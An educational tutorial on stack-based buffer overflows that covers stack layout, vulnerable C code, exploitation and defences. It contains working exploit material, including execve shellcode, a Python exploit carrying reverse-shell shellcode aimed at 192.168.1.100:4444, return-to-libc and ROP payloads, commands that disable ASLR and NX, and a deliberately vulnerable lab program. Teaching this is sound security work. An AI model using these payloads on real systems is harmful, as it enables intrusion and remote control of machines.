Stack-Based Buffer Overflows

Understanding stack-based buffer overflows: how they work, exploitation techniques, and defensive measures.

Introduction to Stack-Based Buffer Overflows

Stack-based buffer overflows represent one of the most fundamental and historically significant classes of software vulnerabilities. Despite being well-understood for decades, they continue to appear in modern software due to the prevalence of memory-unsafe languages like C and C++. This comprehensive guide explores the mechanics, exploitation techniques, and defensive measures related to stack-based buffer overflows.

Understanding the Stack

Stack Fundamentals

The stack is a region of memory used for:

Local variables: Function-scoped variables
Function parameters: Arguments passed to functions
Return addresses: Where to continue execution after function calls
Saved registers: Preserved CPU state

Stack Layout (x86)

The stack grows downward (toward lower memory addresses):

Higher Memory Addresses
┌─────────────────────┐
│   Function Args     │ ← [ebp + 8], [ebp + C], etc.
├─────────────────────┤
│   Return Address    │ ← [ebp + 4]
├─────────────────────┤
│   Saved EBP         │ ← [ebp] (frame pointer)
├─────────────────────┤
│   Local Variable 1  │ ← [ebp - 4]
├─────────────────────┤
│   Local Variable 2  │ ← [ebp - 8]
├─────────────────────┤
│      Buffer         │ ← [ebp - 0x108] (vulnerable buffer)
└─────────────────────┘
Lower Memory Addresses

Vulnerable Code Patterns

Classic Example

#include <stdio.h>
#include <string.h>
void vulnerable_function(char* input) {
    char buffer[256];           // Fixed-size buffer
    strcpy(buffer, input);      // No bounds checking!
    printf("You entered: %s\n", buffer);
}
int main(int argc, char* argv[]) {
    if (argc != 2) {
        printf("Usage: %s <input>\n", argv[0]);
        return 1;
    }
    vulnerable_function(argv[1]);
    return 0;
}

Dangerous Functions

Common functions that can cause buffer overflows:

Function	Risk	Safer Alternative
`strcpy()`	No bounds checking	`strncpy()` or `strlcpy()`
`strcat()`	No bounds checking	`strncat()` or `strlcat()`
`sprintf()`	No bounds checking	`snprintf()`
`gets()`	Never checks bounds	`fgets()`
`scanf("%s")`	No bounds checking	`scanf("%255s")`

Buffer Overflow Mechanics

Normal Function Execution

void function(char* input) {
    char buffer[8];     // 8-byte buffer
    strcpy(buffer, input);
}
// Normal input: "HELLO"
Memory Layout:
[buffer: "HELLO\x00\x00\x00"] [saved ebp] [return addr] [args...]

Buffer Overflow Condition

// Overflow input: "AAAAAAAABBBBCCCCDDDD"
Memory Layout:
[buffer: "AAAAAAAA"] [saved ebp: "BBBB"] [return addr: "CCCC"] [args: "DDDD"]
                                                    ↑
                                            Overwritten return address!

Assembly Analysis

Let's examine the assembly code for our vulnerable function:

vulnerable_function:
    push   ebp              ; Save frame pointer
    mov    ebp, esp         ; Set up new frame
    sub    esp, 0x108       ; Allocate 264 bytes (256 + padding)
    mov    eax, [ebp+8]     ; Get input parameter
    mov    [esp], eax       ; Set up strcpy argument
    lea    eax, [ebp-0x108] ; Get buffer address
    mov    [esp+4], eax     ; Set up strcpy destination
    call   strcpy           ; Vulnerable call
    mov    esp, ebp         ; Restore stack pointer
    pop    ebp              ; Restore frame pointer
    ret                     ; Return (potentially to attacker-controlled address)

Exploitation Techniques

Control Flow Hijacking

The primary goal is to overwrite the return address:

Step 1: Find the Offset

# Create a pattern to find exact offset
python -c "print('A' * 268 + 'BCDE')" > payload.txt
# Run under debugger
gdb ./vulnerable
(gdb) run $(cat payload.txt)
# Check EIP value
(gdb) info registers eip
eip: 0x45444342  # "BCDE" in little-endian
# Buffer is at offset 268 from return address

Step 2: Control Return Address

# Exploit payload structure
payload = "A" * 268        # Padding to reach return address
payload += "\xef\xbe\xad\xde"  # New return address (0xdeadbeef)
# This will cause the program to jump to 0xdeadbeef

Shellcode Injection

Inject and execute arbitrary code:

Simple Shellcode (Linux x86)

# execve("/bin/sh", NULL, NULL) shellcode
shellcode = (
    "\x31\xc0"             # xor eax, eax
    "\x50"                 # push eax
    "\x68\x2f\x2f\x73\x68" # push 0x68732f2f ("/sh")
    "\x68\x2f\x62\x69\x6e" # push 0x6e69622f ("/bin")
    "\x89\xe3"             # mov ebx, esp
    "\x50"                 # push eax
    "\x53"                 # push ebx
    "\x89\xe1"             # mov ecx, esp
    "\xb0\x0b"             # mov al, 0xb (sys_execve)
    "\xcd\x80"             # int 0x80
)
# Complete exploit
nop_sled = "\x90" * 100     # NOP sled for reliability
padding = "A" * (268 - len(nop_sled) - len(shellcode))
return_addr = "\x10\xf0\xff\xbf"  # Address pointing into NOP sled
exploit = nop_sled + shellcode + padding + return_addr

Return-to-libc Attack

When the stack is non-executable, return to existing functions:

# Find function addresses
objdump -T /lib/libc.so.6 | grep system
objdump -T /lib/libc.so.6 | grep exit
# Find string "/bin/sh"
strings -a -t x /lib/libc.so.6 | grep "/bin/sh"
# Exploit payload
padding = "A" * 268
system_addr = "\x60\xb7\xe4\xb7"  # Address of system()
exit_addr = "\x00\x96\xe4\xb7"    # Address of exit()
binsh_addr = "\x0b\x8f\xf8\xb7"   # Address of "/bin/sh"
exploit = padding + system_addr + exit_addr + binsh_addr

Exploitation Tools and Techniques

Pattern Generation

# Using Metasploit pattern tools
./pattern_create.rb -l 300
# GDB PEDA
gdb-peda$ pattern create 300
gdb-peda$ pattern offset 0x41384141
# Python script
def create_pattern(length):
    pattern = ""
    for i in range(length):
        pattern += chr(65 + (i % 26))  # A-Z repeating
    return pattern

Address Discovery

# Find function addresses in GDB
(gdb) print system
(gdb) print exit
(gdb) find 0xb7e00000, 0xb7f50000, "/bin/sh"
# Using ldd to find library base
ldd ./vulnerable
# Environment variable method
env - PWD=$PWD ./vulnerable $(python exploit.py)

Reliable Exploitation

#!/usr/bin/env python
import struct
import subprocess
def exploit():
    # Shellcode (reverse shell to 192.168.1.100:4444)
    shellcode = (
        "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66"
        "\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\xc0"
        "\xa8\x01\x64\x68\x02\x00\x11\x5c\x89\xe1\xb0\x66\x50"
        "\x51\x53\xb3\x03\x89\xe1\xcd\x80\x52\x68\x6e\x2f\x73"
        "\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0"
        "\x0b\xcd\x80"
    )
    # Build exploit
    buffer_size = 268
    nop_sled = "\x90" * 100
    # Calculate padding
    payload_size = len(nop_sled) + len(shellcode)
    padding = "A" * (buffer_size - payload_size)
    # Return address (stack address + offset to NOP sled)
    ret_addr = struct.pack("<I", 0xbffff000 + 200)
    exploit = nop_sled + shellcode + padding + ret_addr
    # Execute
    subprocess.call(["./vulnerable", exploit])
if __name__ == "__main__":
    exploit()

Defense Mechanisms

Stack Canaries

Compiler-inserted guards to detect stack corruption:

# Compile with stack protection
gcc -fstack-protector-all vulnerable.c -o vulnerable
# Generated assembly includes canary checks
function_start:
    mov    rax, QWORD PTR fs:0x28  ; Load canary
    mov    QWORD PTR [rbp-0x8], rax ; Store on stack
    ; ... function body ...
    mov    rax, QWORD PTR [rbp-0x8]  ; Load stored canary
    xor    rax, QWORD PTR fs:0x28    ; Compare with original
    je     .L2                       ; Jump if equal
    call   __stack_chk_fail          ; Abort if mismatch
.L2:
    leave
    ret

Non-Executable Stack (NX/DEP)

Mark stack pages as non-executable:

# Compile with NX protection
gcc -Wl,-z,noexecstack vulnerable.c -o vulnerable
# Check NX bit
readelf -l vulnerable | grep GNU_STACK
# Runtime protection
execstack -q vulnerable    # Query
execstack -s vulnerable    # Set executable (disable protection)
execstack -c vulnerable    # Clear executable (enable protection)

Address Space Layout Randomization (ASLR)

# System-wide ASLR control
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space  # Disable
echo 1 | sudo tee /proc/sys/kernel/randomize_va_space  # Conservative
echo 2 | sudo tee /proc/sys/kernel/randomize_va_space  # Full
# Per-process ASLR
setarch x86_64 -R ./vulnerable  # Disable for this execution
# Check randomization
ldd ./vulnerable  # Run multiple times to see address changes

Advanced Exploitation Techniques

Return-Oriented Programming (ROP)

Chain existing code snippets (gadgets) to bypass NX:

# Find ROP gadgets
ROPgadget --binary ./vulnerable
# Example ROP chain
gadget1 = 0x08048384  # pop eax; ret
gadget2 = 0x08048392  # pop ebx; ret  
gadget3 = 0x080483a0  # int 0x80; ret
# Build ROP chain for execve("/bin/sh", NULL, NULL)
rop_chain = [
    gadget1,        # pop eax; ret
    0x0b,           # sys_execve
    gadget2,        # pop ebx; ret
    binsh_addr,     # "/bin/sh"
    gadget3,        # int 0x80; ret
]
exploit = padding + b"".join(struct.pack("<I", addr) for addr in rop_chain)

Bypassing Stack Canaries

Information leak: Read canary value before overwriting
Brute force: Guess canary byte by byte (forking servers)
Partial overwrite: Overwrite saved frame pointer only
Exception handler: Overwrite SEH records on Windows

ASLR Bypass Techniques

Information disclosure: Leak addresses from memory
Partial overwrite: Modify only lower address bytes
Return-to-PLT: Use procedure linkage table addresses
JIT spray: Control JIT compiler output

Secure Coding Practices

Safe String Functions

// Instead of strcpy
char dest[256];
strncpy(dest, src, sizeof(dest) - 1);
dest[sizeof(dest) - 1] = '\0';
// Better: use strlcpy if available
strlcpy(dest, src, sizeof(dest));
// Or use safe string libraries
#include <bsd/string.h>  // BSD string functions

Input Validation

int safe_copy(char* dest, size_t dest_size, const char* src) {
    if (!dest || !src || dest_size == 0) {
        return -1;  // Invalid parameters
    }
    size_t src_len = strlen(src);
    if (src_len >= dest_size) {
        return -1;  // Source too large
    }
    strcpy(dest, src);  // Now safe
    return 0;
}

Compiler Security Features

# Recommended compilation flags
gcc -fstack-protector-strong \      # Stack canaries
    -D_FORTIFY_SOURCE=2 \           # Runtime checks
    -Wformat-security \             # Format string warnings
    -fPIE -pie \                    # Position independent executable
    -Wl,-z,relro \                  # Read-only relocations
    -Wl,-z,now \                    # Immediate binding
    -Wl,-z,noexecstack \           # Non-executable stack
    program.c -o program

Detection and Analysis

Static Analysis

# Flawfinder - scan for vulnerable functions
flawfinder vulnerable.c
# Cppcheck - static analysis
cppcheck --enable=all vulnerable.c
# Clang static analyzer
clang --analyze vulnerable.c

Dynamic Analysis

# Valgrind memory error detection
valgrind --tool=memcheck ./vulnerable input
# AddressSanitizer
gcc -fsanitize=address -g vulnerable.c -o vulnerable
./vulnerable input
# GDB with plugins
gdb-peda ./vulnerable
gdb-gef ./vulnerable

Fuzzing

# AFL++ fuzzing
afl-gcc vulnerable.c -o vulnerable-afl
mkdir inputs outputs
echo "test" > inputs/seed
afl-fuzz -i inputs -o outputs ./vulnerable-afl @@
# LibFuzzer
clang -fsanitize=fuzzer,address vulnerable.c -o vulnerable-fuzz
./vulnerable-fuzz

Real-World Examples

Historical Vulnerabilities

Morris Worm (1988): Exploited fingerd buffer overflow
Code Red (2001): IIS buffer overflow in indexing service
Slammer (2003): SQL Server buffer overflow
Conficker (2008): Windows Server Service buffer overflow

Modern Mitigations in Practice

Despite decades of awareness, buffer overflows still occur:

Legacy code: Old software with minimal security features
Embedded systems: Resource constraints limit protections
Kernel code: Lower-level code with fewer protections
Custom protocols: Network parsing code vulnerabilities

Hands-On Lab Exercise

Vulnerable Program

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void secret_function() {
    printf("Congratulations! You've gained control!\n");
    system("/bin/sh");
}
void vulnerable_function(char* input) {
    char buffer[64];
    printf("Buffer is at: %p\n", buffer);
    strcpy(buffer, input);
    printf("Input copied: %s\n", buffer);
}
int main(int argc, char* argv[]) {
    printf("Secret function is at: %p\n", secret_function);
    if (argc != 2) {
        printf("Usage: %s <input>\n", argv[0]);
        return 1;
    }
    vulnerable_function(argv[1]);
    printf("Program completed normally.\n");
    return 0;
}

Lab Tasks

Compile without protections: gcc -fno-stack-protector -z execstack -no-pie lab.c -o lab
Find the buffer overflow: Identify vulnerable function
Calculate offset: Determine bytes needed to overwrite return address
Redirect execution: Jump to secret_function
Enable protections: Recompile with security features and observe differences

Conclusion

Stack-based buffer overflows remain a critical vulnerability class that every security professional must understand. While modern defense mechanisms have significantly raised the bar for exploitation, they have not eliminated the threat entirely.

Key takeaways from this comprehensive analysis:

Understanding is crucial: Knowing how attacks work enables better defense
Defense in depth: Multiple protection layers are essential
Secure coding practices: Prevention is better than mitigation
Continuous vigilance: Security requires ongoing attention and updates
Evolution continues: Both attack and defense techniques constantly evolve

As software systems become more complex, the fundamental principles of memory safety become even more important. Whether you're a developer writing secure code, a security analyst hunting for vulnerabilities, or a system administrator implementing defenses, understanding buffer overflows provides essential knowledge for building and maintaining secure systems.

The techniques covered in this guide provide a foundation for understanding both historical and modern exploitation methods, as well as the defensive measures that have evolved to counter them. Remember that with great knowledge comes great responsibility—use this information ethically and only for legitimate security research and defense.